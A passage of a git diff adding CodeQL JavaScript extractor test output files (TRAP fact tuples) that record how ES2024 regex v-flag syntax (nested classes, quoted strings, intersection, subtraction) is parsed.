+literals("/[[abc]&&[bcd]&&[c]]/v","/[[abc]&&[bcd]&&[c]]/v",#20101) +#20102=* +regexpterm(#20102,23,#20101,0,"[[abc]&&[bcd]&&[c]]") +#20103=@"loc,{#10000},7,2,7,20" +locations_default(#20103,#10000,7,2,7,20) +hasLocation(#20102,#20103) +#20104=* +regexpterm(#20104,29,#20102,0,"[[abc]&&[bcd]&&[c]]") +hasLocation(#20104,#20103) +#20105=* +regexpterm(#20105,23,#20104,0,"[abc]") +#20106=@"loc,{#10000},7,3,7,7" +locations_default(#20106,#10000,7,3,7,7) +hasLocation(#20105,#20106) +#20107=* +regexpterm(#20107,14,#20105,0,"a") +#20108=@"loc,{#10000},7,4,7,4" +locations_default(#20108,#10000,7,4,7,4) +hasLocation(#20107,#20108) +regexp_const_value(#20107,"a") +#20109=* +regexpterm(#20109,14,#20105,1,"b") +#20110=@"loc,{#10000},7,5,7,5" +locations_default(#20110,#10000,7,5,7,5) +hasLocation(#20109,#20110) +regexp_const_value(#20109,"b") +#20111=* +regexpterm(#20111,14,#20105,2,"c") +#20112=@"loc,{#10000},7,6,7,6" +locations_default(#20112,#10000,7,6,7,6) +hasLocation(#20111,#20112) +regexp_const_value(#20111,"c") +#20113=* +regexpterm(#20113,23,#20104,1,"[bcd]") +#20114=@"loc,{#10000},7,10,7,14" +locations_default(#20114,#10000,7,10,7,14) +hasLocation(#20113,#20114) +#20115=* +regexpterm(#20115,14,#20113,0,"b") +#20116=@"loc,{#10000},7,11,7,11" +locations_default(#20116,#10000,7,11,7,11) +hasLocation(#20115,#20116) +regexp_const_value(#20115,"b") +#20117=* +regexpterm(#20117,14,#20113,1,"c") +#20118=@"loc,{#10000},7,12,7,12" +locations_default(#20118,#10000,7,12,7,12) +hasLocation(#20117,#20118) +regexp_const_value(#20117,"c") +#20119=* +regexpterm(#20119,14,#20113,2,"d") +#20120=@"loc,{#10000},7,13,7,13" +locations_default(#20120,#10000,7,13,7,13) +hasLocation(#20119,#20120) +regexp_const_value(#20119,"d") +#20121=* +regexpterm(#20121,23,#20104,2,"[c]") +#20122=@"loc,{#10000},7,17,7,19" +locations_default(#20122,#10000,7,17,7,19) +hasLocation(#20121,#20122) +#20123=* +regexpterm(#20123,14,#20121,0,"c") +#20124=@"loc,{#10000},7,18,7,18" +locations_default(#20124,#10000,7,18,7,18) +hasLocation(#20123,#20124) +regexp_const_value(#20123,"c") +#20125=* +entry_cfg_node(#20125,#20001) +#20126=@"loc,{#10000},1,1,1,0" +locations_default(#20126,#10000,1,1,1,0) +hasLocation(#20125,#20126) +#20127=* +exit_cfg_node(#20127,#20001) +hasLocation(#20127,#20047) +successor(#20099,#20101) +successor(#20101,#20127) +successor(#20076,#20078) +successor(#20078,#20099) +successor(#20071,#20073) +successor(#20073,#20076) +successor(#20049,#20051) +successor(#20051,#20071) +successor(#20125,#20049) +numlines(#10000,7,4,7) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/output/trap/regex_nested_character_class.js.trap b/javascript/extractor/tests/es2024/output/trap/regex_nested_character_class.js.trap new file mode 100644 index 000000000000..c3bc9112cc56 --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/regex_nested_character_class.js.trap @@ -0,0 +1,211 @@ +#10000=@"/regex_nested_character_class.js;sourcefile" +files(#10000,"/regex_nested_character_class.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +comments(#20002,0,#20001,"Previously not allowed to nest character classes now completely valid with v flag.","//Previ ... v flag.") +#20003=@"loc,{#10000},1,10,1,93" +locations_default(#20003,#10000,1,10,1,93) +hasLocation(#20002,#20003) +#20004=* +lines(#20004,#20001,"/[[]]/v; //Previously not allowed to nest character classes now completely valid with v flag."," +") +#20005=@"loc,{#10000},1,1,1,93" +locations_default(#20005,#10000,1,1,1,93) +hasLocation(#20004,#20005) +#20006=* +lines(#20006,#20001,"/[[a]]/v;"," +") +#20007=@"loc,{#10000},2,1,2,9" +locations_default(#20007,#10000,2,1,2,9) +hasLocation(#20006,#20007) +#20008=* +lines(#20008,#20001,"/[ [] [ [] [] ] ]/v;"," +") +#20009=@"loc,{#10000},3,1,3,20" +locations_default(#20009,#10000,3,1,3,20) +hasLocation(#20008,#20009) +numlines(#20001,3,3,1) +#20010=* +tokeninfo(#20010,5,#20001,0,"/[[]]/v") +#20011=@"loc,{#10000},1,1,1,7" +locations_default(#20011,#10000,1,1,1,7) +hasLocation(#20010,#20011) +#20012=* +tokeninfo(#20012,8,#20001,1,";") +#20013=@"loc,{#10000},1,8,1,8" +locations_default(#20013,#10000,1,8,1,8) +hasLocation(#20012,#20013) +#20014=* +tokeninfo(#20014,5,#20001,2,"/[[a]]/v") +#20015=@"loc,{#10000},2,1,2,8" +locations_default(#20015,#10000,2,1,2,8) +hasLocation(#20014,#20015) +next_token(#20002,#20014) +#20016=* +tokeninfo(#20016,8,#20001,3,";") +#20017=@"loc,{#10000},2,9,2,9" +locations_default(#20017,#10000,2,9,2,9) +hasLocation(#20016,#20017) +#20018=* +tokeninfo(#20018,5,#20001,4,"/[ [] [ [] [] ] ]/v") +#20019=@"loc,{#10000},3,1,3,19" +locations_default(#20019,#10000,3,1,3,19) +hasLocation(#20018,#20019) +#20020=* +tokeninfo(#20020,8,#20001,5,";") +#20021=@"loc,{#10000},3,20,3,20" +locations_default(#20021,#10000,3,20,3,20) +hasLocation(#20020,#20021) +#20022=* +tokeninfo(#20022,0,#20001,6,"") +#20023=@"loc,{#10000},4,1,4,0" +locations_default(#20023,#10000,4,1,4,0) +hasLocation(#20022,#20023) +toplevels(#20001,0) +#20024=@"loc,{#10000},1,1,4,0" +locations_default(#20024,#10000,1,1,4,0) +hasLocation(#20001,#20024) +#20025=* +stmts(#20025,2,#20001,0,"/[[]]/v;") +#20026=@"loc,{#10000},1,1,1,8" +locations_default(#20026,#10000,1,1,1,8) +hasLocation(#20025,#20026) +stmt_containers(#20025,#20001) +#20027=* +exprs(#20027,5,#20025,0,"/[[]]/v") +hasLocation(#20027,#20011) +enclosing_stmt(#20027,#20025) +expr_containers(#20027,#20001) +literals("/[[]]/v","/[[]]/v",#20027) +#20028=* +regexpterm(#20028,23,#20027,0,"[[]]") +#20029=@"loc,{#10000},1,2,1,5" +locations_default(#20029,#10000,1,2,1,5) +hasLocation(#20028,#20029) +#20030=* +regexpterm(#20030,23,#20028,0,"[]") +#20031=@"loc,{#10000},1,3,1,4" +locations_default(#20031,#10000,1,3,1,4) +hasLocation(#20030,#20031) +#20032=* +stmts(#20032,2,#20001,1,"/[[a]]/v;") +hasLocation(#20032,#20007) +stmt_containers(#20032,#20001) +#20033=* +exprs(#20033,5,#20032,0,"/[[a]]/v") +hasLocation(#20033,#20015) +enclosing_stmt(#20033,#20032) +expr_containers(#20033,#20001) +literals("/[[a]]/v","/[[a]]/v",#20033) +#20034=* +regexpterm(#20034,23,#20033,0,"[[a]]") +#20035=@"loc,{#10000},2,2,2,6" +locations_default(#20035,#10000,2,2,2,6) +hasLocation(#20034,#20035) +#20036=* +regexpterm(#20036,23,#20034,0,"[a]") +#20037=@"loc,{#10000},2,3,2,5" +locations_default(#20037,#10000,2,3,2,5) +hasLocation(#20036,#20037) +#20038=* +regexpterm(#20038,14,#20036,0,"a") +#20039=@"loc,{#10000},2,4,2,4" +locations_default(#20039,#10000,2,4,2,4) +hasLocation(#20038,#20039) +regexp_const_value(#20038,"a") +#20040=* +stmts(#20040,2,#20001,2,"/[ [] [ [] [] ] ]/v;") +hasLocation(#20040,#20009) +stmt_containers(#20040,#20001) +#20041=* +exprs(#20041,5,#20040,0,"/[ [] [ [] [] ] ]/v") +hasLocation(#20041,#20019) +enclosing_stmt(#20041,#20040) +expr_containers(#20041,#20001) +literals("/[ [] [ [] [] ] ]/v","/[ [] [ [] [] ] ]/v",#20041) +#20042=* +regexpterm(#20042,23,#20041,0,"[ [] [ [] [] ] ]") +#20043=@"loc,{#10000},3,2,3,17" +locations_default(#20043,#10000,3,2,3,17) +hasLocation(#20042,#20043) +#20044=* +regexpterm(#20044,14,#20042,0," ") +#20045=@"loc,{#10000},3,3,3,3" +locations_default(#20045,#10000,3,3,3,3) +hasLocation(#20044,#20045) +regexp_const_value(#20044," ") +#20046=* +regexpterm(#20046,23,#20042,1,"[]") +#20047=@"loc,{#10000},3,4,3,5" +locations_default(#20047,#10000,3,4,3,5) +hasLocation(#20046,#20047) +#20048=* +regexpterm(#20048,14,#20042,2," ") +#20049=@"loc,{#10000},3,6,3,6" +locations_default(#20049,#10000,3,6,3,6) +hasLocation(#20048,#20049) +regexp_const_value(#20048," ") +#20050=* +regexpterm(#20050,23,#20042,3,"[ [] [] ]") +#20051=@"loc,{#10000},3,7,3,15" +locations_default(#20051,#10000,3,7,3,15) +hasLocation(#20050,#20051) +#20052=* +regexpterm(#20052,14,#20050,0," ") +#20053=@"loc,{#10000},3,8,3,8" +locations_default(#20053,#10000,3,8,3,8) +hasLocation(#20052,#20053) +regexp_const_value(#20052," ") +#20054=* +regexpterm(#20054,23,#20050,1,"[]") +#20055=@"loc,{#10000},3,9,3,10" +locations_default(#20055,#10000,3,9,3,10) +hasLocation(#20054,#20055) +#20056=* +regexpterm(#20056,14,#20050,2," ") +#20057=@"loc,{#10000},3,11,3,11" +locations_default(#20057,#10000,3,11,3,11) +hasLocation(#20056,#20057) +regexp_const_value(#20056," ") +#20058=* +regexpterm(#20058,23,#20050,3,"[]") +#20059=@"loc,{#10000},3,12,3,13" +locations_default(#20059,#10000,3,12,3,13) +hasLocation(#20058,#20059) +#20060=* +regexpterm(#20060,14,#20050,4," ") +#20061=@"loc,{#10000},3,14,3,14" +locations_default(#20061,#10000,3,14,3,14) +hasLocation(#20060,#20061) +regexp_const_value(#20060," ") +#20062=* +regexpterm(#20062,14,#20042,4," ") +#20063=@"loc,{#10000},3,16,3,16" +locations_default(#20063,#10000,3,16,3,16) +hasLocation(#20062,#20063) +regexp_const_value(#20062," ") +#20064=* +entry_cfg_node(#20064,#20001) +#20065=@"loc,{#10000},1,1,1,0" +locations_default(#20065,#10000,1,1,1,0) +hasLocation(#20064,#20065) +#20066=* +exit_cfg_node(#20066,#20001) +hasLocation(#20066,#20023) +successor(#20040,#20041) +successor(#20041,#20066) +successor(#20032,#20033) +successor(#20033,#20040) +successor(#20025,#20027) +successor(#20027,#20032) +successor(#20064,#20025) +numlines(#10000,3,3,1) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/output/trap/regex_quoted_string.js.trap b/javascript/extractor/tests/es2024/output/trap/regex_quoted_string.js.trap new file mode 100644 index 000000000000..822a1302bcf5 --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/regex_quoted_string.js.trap @@ -0,0 +1,286 @@ +#10000=@"/regex_quoted_string.js;sourcefile" +files(#10000,"/regex_quoted_string.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +lines(#20002,#20001,"/[\q{abc}]/v;"," +") +#20003=@"loc,{#10000},1,1,1,13" +locations_default(#20003,#10000,1,1,1,13) +hasLocation(#20002,#20003) +#20004=* +lines(#20004,#20001,"/[\q{abc|cbd|dcb}]/v;"," +") +#20005=@"loc,{#10000},2,1,2,21" +locations_default(#20005,#10000,2,1,2,21) +hasLocation(#20004,#20005) +#20006=* +lines(#20006,#20001,"/[\q{\}}]/v;"," +") +#20007=@"loc,{#10000},3,1,3,12" +locations_default(#20007,#10000,3,1,3,12) +hasLocation(#20006,#20007) +#20008=* +lines(#20008,#20001,"/[\q{\{}]/v;"," +") +#20009=@"loc,{#10000},4,1,4,12" +locations_default(#20009,#10000,4,1,4,12) +hasLocation(#20008,#20009) +#20010=* +lines(#20010,#20001,"/[\q{cc|\}a|cc}]/v;"," +") +#20011=@"loc,{#10000},5,1,5,19" +locations_default(#20011,#10000,5,1,5,19) +hasLocation(#20010,#20011) +numlines(#20001,5,5,0) +#20012=* +tokeninfo(#20012,5,#20001,0,"/[\q{abc}]/v") +#20013=@"loc,{#10000},1,1,1,12" +locations_default(#20013,#10000,1,1,1,12) +hasLocation(#20012,#20013) +#20014=* +tokeninfo(#20014,8,#20001,1,";") +#20015=@"loc,{#10000},1,13,1,13" +locations_default(#20015,#10000,1,13,1,13) +hasLocation(#20014,#20015) +#20016=* +tokeninfo(#20016,5,#20001,2,"/[\q{abc|cbd|dcb}]/v") +#20017=@"loc,{#10000},2,1,2,20" +locations_default(#20017,#10000,2,1,2,20) +hasLocation(#20016,#20017) +#20018=* +tokeninfo(#20018,8,#20001,3,";") +#20019=@"loc,{#10000},2,21,2,21" +locations_default(#20019,#10000,2,21,2,21) +hasLocation(#20018,#20019) +#20020=* +tokeninfo(#20020,5,#20001,4,"/[\q{\}}]/v") +#20021=@"loc,{#10000},3,1,3,11" +locations_default(#20021,#10000,3,1,3,11) +hasLocation(#20020,#20021) +#20022=* +tokeninfo(#20022,8,#20001,5,";") +#20023=@"loc,{#10000},3,12,3,12" +locations_default(#20023,#10000,3,12,3,12) +hasLocation(#20022,#20023) +#20024=* +tokeninfo(#20024,5,#20001,6,"/[\q{\{}]/v") +#20025=@"loc,{#10000},4,1,4,11" +locations_default(#20025,#10000,4,1,4,11) +hasLocation(#20024,#20025) +#20026=* +tokeninfo(#20026,8,#20001,7,";") +#20027=@"loc,{#10000},4,12,4,12" +locations_default(#20027,#10000,4,12,4,12) +hasLocation(#20026,#20027) +#20028=* +tokeninfo(#20028,5,#20001,8,"/[\q{cc|\}a|cc}]/v") +#20029=@"loc,{#10000},5,1,5,18" +locations_default(#20029,#10000,5,1,5,18) +hasLocation(#20028,#20029) +#20030=* +tokeninfo(#20030,8,#20001,9,";") +#20031=@"loc,{#10000},5,19,5,19" +locations_default(#20031,#10000,5,19,5,19) +hasLocation(#20030,#20031) +#20032=* +tokeninfo(#20032,0,#20001,10,"") +#20033=@"loc,{#10000},6,1,6,0" +locations_default(#20033,#10000,6,1,6,0) +hasLocation(#20032,#20033) +toplevels(#20001,0) +#20034=@"loc,{#10000},1,1,6,0" +locations_default(#20034,#10000,1,1,6,0) +hasLocation(#20001,#20034) +#20035=* +stmts(#20035,2,#20001,0,"/[\q{abc}]/v;") +hasLocation(#20035,#20003) +stmt_containers(#20035,#20001) +#20036=* +exprs(#20036,5,#20035,0,"/[\q{abc}]/v") +hasLocation(#20036,#20013) +enclosing_stmt(#20036,#20035) +expr_containers(#20036,#20001) +literals("/[\q{abc}]/v","/[\q{abc}]/v",#20036) +#20037=* +regexpterm(#20037,23,#20036,0,"[\q{abc}]") +#20038=@"loc,{#10000},1,2,1,10" +locations_default(#20038,#10000,1,2,1,10) +hasLocation(#20037,#20038) +#20039=* +regexpterm(#20039,28,#20037,0,"\q{abc}") +#20040=@"loc,{#10000},1,3,1,9" +locations_default(#20040,#10000,1,3,1,9) +hasLocation(#20039,#20040) +#20041=* +regexpterm(#20041,14,#20039,0,"abc") +#20042=@"loc,{#10000},1,6,1,8" +locations_default(#20042,#10000,1,6,1,8) +hasLocation(#20041,#20042) +regexp_const_value(#20041,"abc") +#20043=* +stmts(#20043,2,#20001,1,"/[\q{ab ... cb}]/v;") +hasLocation(#20043,#20005) +stmt_containers(#20043,#20001) +#20044=* +exprs(#20044,5,#20043,0,"/[\q{abc|cbd|dcb}]/v") +hasLocation(#20044,#20017) +enclosing_stmt(#20044,#20043) +expr_containers(#20044,#20001) +literals("/[\q{abc|cbd|dcb}]/v","/[\q{abc|cbd|dcb}]/v",#20044) +#20045=* +regexpterm(#20045,23,#20044,0,"[\q{abc|cbd|dcb}]") +#20046=@"loc,{#10000},2,2,2,18" +locations_default(#20046,#10000,2,2,2,18) +hasLocation(#20045,#20046) +#20047=* +regexpterm(#20047,28,#20045,0,"\q{abc|cbd|dcb}") +#20048=@"loc,{#10000},2,3,2,17" +locations_default(#20048,#10000,2,3,2,17) +hasLocation(#20047,#20048) +#20049=* +regexpterm(#20049,0,#20047,0,"abc|cbd|dcb") +#20050=@"loc,{#10000},2,6,2,16" +locations_default(#20050,#10000,2,6,2,16) +hasLocation(#20049,#20050) +#20051=* +regexpterm(#20051,14,#20049,0,"abc") +#20052=@"loc,{#10000},2,6,2,8" +locations_default(#20052,#10000,2,6,2,8) +hasLocation(#20051,#20052) +regexp_const_value(#20051,"abc") +#20053=* +regexpterm(#20053,14,#20049,1,"cbd") +#20054=@"loc,{#10000},2,10,2,12" +locations_default(#20054,#10000,2,10,2,12) +hasLocation(#20053,#20054) +regexp_const_value(#20053,"cbd") +#20055=* +regexpterm(#20055,14,#20049,2,"dcb") +#20056=@"loc,{#10000},2,14,2,16" +locations_default(#20056,#10000,2,14,2,16) +hasLocation(#20055,#20056) +regexp_const_value(#20055,"dcb") +#20057=* +stmts(#20057,2,#20001,2,"/[\q{\}}]/v;") +hasLocation(#20057,#20007) +stmt_containers(#20057,#20001) +#20058=* +exprs(#20058,5,#20057,0,"/[\q{\}}]/v") +hasLocation(#20058,#20021) +enclosing_stmt(#20058,#20057) +expr_containers(#20058,#20001) +literals("/[\q{\}}]/v","/[\q{\}}]/v",#20058) +#20059=* +regexpterm(#20059,23,#20058,0,"[\q{\}}]") +#20060=@"loc,{#10000},3,2,3,9" +locations_default(#20060,#10000,3,2,3,9) +hasLocation(#20059,#20060) +#20061=* +regexpterm(#20061,28,#20059,0,"\q{\}}") +#20062=@"loc,{#10000},3,3,3,8" +locations_default(#20062,#10000,3,3,3,8) +hasLocation(#20061,#20062) +#20063=* +regexpterm(#20063,14,#20061,0,"\}") +#20064=@"loc,{#10000},3,6,3,7" +locations_default(#20064,#10000,3,6,3,7) +hasLocation(#20063,#20064) +regexp_const_value(#20063,"\}") +#20065=* +stmts(#20065,2,#20001,3,"/[\q{\{}]/v;") +hasLocation(#20065,#20009) +stmt_containers(#20065,#20001) +#20066=* +exprs(#20066,5,#20065,0,"/[\q{\{}]/v") +hasLocation(#20066,#20025) +enclosing_stmt(#20066,#20065) +expr_containers(#20066,#20001) +literals("/[\q{\{}]/v","/[\q{\{}]/v",#20066) +#20067=* +regexpterm(#20067,23,#20066,0,"[\q{\{}]") +#20068=@"loc,{#10000},4,2,4,9" +locations_default(#20068,#10000,4,2,4,9) +hasLocation(#20067,#20068) +#20069=* +regexpterm(#20069,28,#20067,0,"\q{\{}") +#20070=@"loc,{#10000},4,3,4,8" +locations_default(#20070,#10000,4,3,4,8) +hasLocation(#20069,#20070) +#20071=* +regexpterm(#20071,14,#20069,0,"\{") +#20072=@"loc,{#10000},4,6,4,7" +locations_default(#20072,#10000,4,6,4,7) +hasLocation(#20071,#20072) +regexp_const_value(#20071,"\{") +#20073=* +stmts(#20073,2,#20001,4,"/[\q{cc|\}a|cc}]/v;") +hasLocation(#20073,#20011) +stmt_containers(#20073,#20001) +#20074=* +exprs(#20074,5,#20073,0,"/[\q{cc|\}a|cc}]/v") +hasLocation(#20074,#20029) +enclosing_stmt(#20074,#20073) +expr_containers(#20074,#20001) +literals("/[\q{cc|\}a|cc}]/v","/[\q{cc|\}a|cc}]/v",#20074) +#20075=* +regexpterm(#20075,23,#20074,0,"[\q{cc|\}a|cc}]") +#20076=@"loc,{#10000},5,2,5,16" +locations_default(#20076,#10000,5,2,5,16) +hasLocation(#20075,#20076) +#20077=* +regexpterm(#20077,28,#20075,0,"\q{cc|\}a|cc}") +#20078=@"loc,{#10000},5,3,5,15" +locations_default(#20078,#10000,5,3,5,15) +hasLocation(#20077,#20078) +#20079=* +regexpterm(#20079,0,#20077,0,"cc|\}a|cc") +#20080=@"loc,{#10000},5,6,5,14" +locations_default(#20080,#10000,5,6,5,14) +hasLocation(#20079,#20080) +#20081=* +regexpterm(#20081,14,#20079,0,"cc") +#20082=@"loc,{#10000},5,6,5,7" +locations_default(#20082,#10000,5,6,5,7) +hasLocation(#20081,#20082) +regexp_const_value(#20081,"cc") +#20083=* +regexpterm(#20083,14,#20079,1,"\}a") +#20084=@"loc,{#10000},5,9,5,11" +locations_default(#20084,#10000,5,9,5,11) +hasLocation(#20083,#20084) +regexp_const_value(#20083,"\}a") +#20085=* +regexpterm(#20085,14,#20079,2,"cc") +#20086=@"loc,{#10000},5,13,5,14" +locations_default(#20086,#10000,5,13,5,14) +hasLocation(#20085,#20086) +regexp_const_value(#20085,"cc") +#20087=* +entry_cfg_node(#20087,#20001) +#20088=@"loc,{#10000},1,1,1,0" +locations_default(#20088,#10000,1,1,1,0) +hasLocation(#20087,#20088) +#20089=* +exit_cfg_node(#20089,#20001) +hasLocation(#20089,#20033) +successor(#20073,#20074) +successor(#20074,#20089) +successor(#20065,#20066) +successor(#20066,#20073) +successor(#20057,#20058) +successor(#20058,#20065) +successor(#20043,#20044) +successor(#20044,#20057) +successor(#20035,#20036) +successor(#20036,#20043) +successor(#20087,#20035) +numlines(#10000,5,5,0) +filetype(#10000,"javascript") diff --git a/javascript/extractor/tests/es2024/output/trap/subtraction.js.trap b/javascript/extractor/tests/es2024/output/trap/subtraction.js.trap new file mode 100644 index 000000000000..ee3dc27da9d5 --- /dev/null +++ b/javascript/extractor/tests/es2024/output/trap/subtraction.js.trap @@ -0,0 +1,268 @@ +#10000=@"/subtraction.js;sourcefile" +files(#10000,"/subtraction.js") +#10001=@"/;folder" +folders(#10001,"/") +containerparent(#10001,#10000) +#10002=@"loc,{#10000},0,0,0,0" +locations_default(#10002,#10000,0,0,0,0) +hasLocation(#10000,#10002) +#20000=@"global_scope" +scopes(#20000,0) +#20001=@"script;{#10000},1,1" +#20002=* +lines(#20002,#20001,"/[\p{Script_Extensions=Greek}--\p{Letter}]/v;"," +") +#20003=@"loc,{#10000},1,1,1,45" +locations_default(#20003,#10000,1,1,1,45) +hasLocation(#20002,#20003) +#20004=* +lines(#20004,#20001,"/[[abc]--[cbd]]/v;"," +") +#20005=@"loc,{#10000},2,1,2,18" +locations_default(#20005,#10000,2,1,2,18) +hasLocation(#20004,#20005) +#20006=* +lines(#20006,#20001,"/[[abc]--[cbd]--[bde]]/v;"," +") +#20007=@"loc,{#10000},3,1,3,25" +locations_default(#20007,#10000,3,1,3,25) +hasLocation(#20006,#20007) +numlines(#20001,3,3,0) +#20008=* +tokeninfo(#20008,5,#20001,0,"/[\p{Script_Extensions=Greek}--\p{Letter}]/v") +#20009=@"loc,{#10000},1,1,1,44" +locations_default(#20009,#10000,1,1,1,44) +hasLocation(#20008,#20009) +#20010=* +tokeninfo(#20010,8,#20001,1,";") +#20011=@"loc,{#10000},1,45,1,45" +locations_default(#20011,#10000,1,45,1,45) +hasLocation(#20010,#20011) +#20012=* +tokeninfo(#20012,5,#20001,2,"/[[abc]--[cbd]]/v") +#20013=@"loc,{#10000},2,1,2,17" +locations_default(#20013,#10000,2,1,2,17) +hasLocation(#20012,#20013) +#20014=* +tokeninfo(#20014,8,#20001,3,";") +#20015=@"loc,{#10000},2,18,2,18" +locations_default(#20015,#10000,2,18,2,18) +hasLocation(#20014,#20015) +#20016=* +tokeninfo(#20016,5,#20001,4,"/[[abc]--[cbd]--[bde]]/v") +#20017=@"loc,{#10000},3,1,3,24" +locations_default(#20017,#10000,3,1,3,24) +hasLocation(#20016,#20017) +#20018=* +tokeninfo(#20018,8,#20001,5,";") +#20019=@"loc,{#10000},3,25,3,25" +locations_default(#20019,#10000,3,25,3,25) +hasLocation(#20018,#20019) +#20020=* +tokeninfo(#20020,0,#20001,6,"") +#20021=@"loc,{#10000},4,1,4,0" +locations_default(#20021,#10000,4,1,4,0) +hasLocation(#20020,#20021) +toplevels(#20001,0) +#20022=@"loc,{#10000},1,1,4,0" +locations_default(#20022,#10000,1,1,4,0) +hasLocation(#20001,#20022) +#20023=* +stmts(#20023,2,#20001,0,"/[\p{Sc ... er}]/v;") +hasLocation(#20023,#20003) +stmt_containers(#20023,#20001) +#20024=* +exprs(#20024,5,#20023,0,"/[\p{Sc ... ter}]/v") +hasLocation(#20024,#20009) +enclosing_stmt(#20024,#20023) +expr_containers(#20024,#20001) +literals("/[\p{Script_Extensions=Greek}--\p{Letter}]/v","/[\p{Script_Extensions=Greek}--\p{Letter}]/v",#20024) +#20025=* +regexpterm(#20025,23,#20024,0,"[\p{Script_Extensions=Greek}--\p{Letter}]") +#20026=@"loc,{#10000},1,2,1,42" +locations_default(#20026,#10000,1,2,1,42) +hasLocation(#20025,#20026) +#20027=* +regexpterm(#20027,30,#20025,0,"[\p{Script_Extensions=Greek}--\p{Letter}]") +hasLocation(#20027,#20026) +#20028=* +regexpterm(#20028,27,#20027,0,"\p{Script_Extensions=Greek}") +#20029=@"loc,{#10000},1,3,1,29" +locations_default(#20029,#10000,1,3,1,29) +hasLocation(#20028,#20029) +unicode_property_escapename(#20028,"Script_Extensions") +unicode_property_escapevalue(#20028,"Greek") +#20030=* +regexpterm(#20030,27,#20027,1,"\p{Letter}") +#20031=@"loc,{#10000},1,32,1,41" +locations_default(#20031,#10000,1,32,1,41) +hasLocation(#20030,#20031) +unicode_property_escapename(#20030,"Letter") +#20032=* +stmts(#20032,2,#20001,1,"/[[abc]--[cbd]]/v;") +hasLocation(#20032,#20005) +stmt_containers(#20032,#20001) +#20033=* +exprs(#20033,5,#20032,0,"/[[abc]--[cbd]]/v") +hasLocation(#20033,#20013) +enclosing_stmt(#20033,#20032) +expr_containers(#20033,#20001) +literals("/[[abc]--[cbd]]/v","/[[abc]--[cbd]]/v",#20033) +#20034=* +regexpterm(#20034,23,#20033,0,"[[abc]--[cbd]]") +#20035=@"loc,{#10000},2,2,2,15" +locations_default(#20035,#10000,2,2,2,15) +hasLocation(#20034,#20035) +#20036=* +regexpterm(#20036,30,#20034,0,"[[abc]--[cbd]]") +hasLocation(#20036,#20035) +#20037=* +regexpterm(#20037,23,#20036,0,"[abc]") +#20038=@"loc,{#10000},2,3,2,7" +locations_default(#20038,#10000,2,3,2,7) +hasLocation(#20037,#20038) +#20039=* +regexpterm(#20039,14,#20037,0,"a") +#20040=@"loc,{#10000},2,4,2,4" +locations_default(#20040,#10000,2,4,2,4) +hasLocation(#20039,#20040) +regexp_const_value(#20039,"a") +#20041=* +regexpterm(#20041,14,#20037,1,"b") +#20042=@"loc,{#10000},2,5,2,5" +locations_default(#20042,#10000,2,5,2,5) +hasLocation(#20041,#20042) +regexp_const_value(#20041,"b") +#20043=* +regexpterm(#20043,14,#20037,2,"c") +#20044=@"loc,{#10000},2,6,2,6" +locations_default(#20044,#10000,2,6,2,6) +hasLocation(#20043,#20044) +regexp_const_value(#20043,"c") +#20045=* +regexpterm(#20045,23,#20036,1,"[cbd]") +#20046=@"loc,{#10000},2,10,2,14" +locations_default(#20046,#10000,2,10,2,14) +hasLocation(#20045,#20046) +#20047=* +regexpterm(#20047,14,#20045,0,"c") +#20048=@"loc,{#10000},2,11,2,11" +locations_default(#20048,#10000,2,11,2,11) +hasLocation(#20047,#20048) +regexp_const_value(#20047,"c") +#20049=* +regexpterm(#20049,14,#20045,1,"b") +#20050=@"loc,{#10000},2,12,2,12" +locations_default(#20050,#10000,2,12,2,12) +hasLocation(#20049,#20050) +regexp_const_value(#20049,"b") +#20051=* +regexpterm(#20051,14,#20045,2,"d") +#20052=@"loc,{#10000},2,13,2,13" +locations_default(#20052,#10000,2,13,2,13) +hasLocation(#20051,#20052) +regexp_const_value(#20051,"d") +#20053=* +stmts(#20053,2,#20001,2,"/[[abc] ... de]]/v;") +hasLocation(#20053,#20007) +stmt_containers(#20053,#20001) +#20054=* +exprs(#20054,5,#20053,0,"/[[abc] ... bde]]/v") +hasLocation(#20054,#20017) +enclosing_stmt(#20054,#20053) +expr_containers(#20054,#20001) +literals("/[[abc]--[cbd]--[bde]]/v","/[[abc]--[cbd]--[bde]]/v",#20054) +#20055=* +regexpterm(#20055,23,#20054,0,"[[abc]--[cbd]--[bde]]") +#20056=@"loc,{#10000},3,2,3,22" +locations_default(#20056,#10000,3,2,3,22) +hasLocation(#20055,#20056) +#20057=* +regexpterm(#20057,30,#20055,0,"[[abc]--[cbd]--[bde]]") +hasLocation(#20057,#20056) +#20058=* +regexpterm(#20058,23,#20057,0,"[abc]") +#20059=@"loc,{#10000},3,3,3,7" +locations_default(#20059,#10000,3,3,3,7) +hasLocation(#20058,#20059) +#20060=* +regexpterm(#20060,14,#20058,0,"a") +#20061=@"loc,{#10000},3,4,3,4" +locations_default(#20061,#10000,3,4,3,4) +hasLocation(#20060,#20061) +regexp_const_value(#20060,"a") +#20062=* +regexpterm(#20062,14,#20058,1,"b") +#20063=@"loc,{#10000},3,5,3,5" +locations_default(#20063,#10000,3,5,3,5) +hasLocation(#20062,#20063) +regexp_const_value(#20062,"b") +#20064=* +regexpterm(#20064,14,#20058,2,"c") +#20065=@"loc,{#10000},3,6,3,6" +locations_default(#20065,#10000,3,6,3,6) +hasLocation(#20064,#20065) +regexp_const_value(#20064,"c") +#20066=* +regexpterm(#20066,23,#20057,1,"[cbd]") +#20067=@"loc,{#10000},3,10,3,14" +locations_default(#20067,#10000,3,10,3,14) +hasLocation(#20066,#20067) +#20068=* +regexpterm(#20068,14,#20066,0,"c") +#20069=@"loc,{#10000},3,11,3,11" +locations_default(#20069,#10000,3,11,3,11) +hasLocation(#20068,#20069) +regexp_const_value(#20068,"c") +#20070=* +regexpterm(#20070,14,#20066,1,"b") +#20071=@"loc,{#10000},3,12,3,12" +locations_default(#20071,#10000,3,12,3,12) +hasLocation(#20070,#20071) 